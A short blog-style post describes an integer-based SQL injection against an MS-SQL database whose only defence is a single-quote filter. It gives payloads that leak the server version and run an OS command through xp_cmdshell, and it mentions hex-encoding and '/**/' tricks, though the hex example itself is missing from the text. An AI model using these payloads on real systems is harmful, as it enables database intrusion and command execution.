SQL Injection, Getting past the magic quote

I recently encountered a SQL Injection, against a MS-SQL database. It happened to be an integer based injection.  Developers thought, that checking for a single quote(') in the input, would be sufficient to protect against SQL Injection attacks. What this meant was i can ask the server to return information like this:-

id=1 and 1=(select @@version)-- 

However, becuase the application checks for single quote in input, i could not run this query successfully:-

id=1; exec master..xp_cmdshell('ping');--

This could , however be bypassed by using a simple hex encoding trick.




In the above example, there is also a small trick to bypass white space protection in the input by using /**/.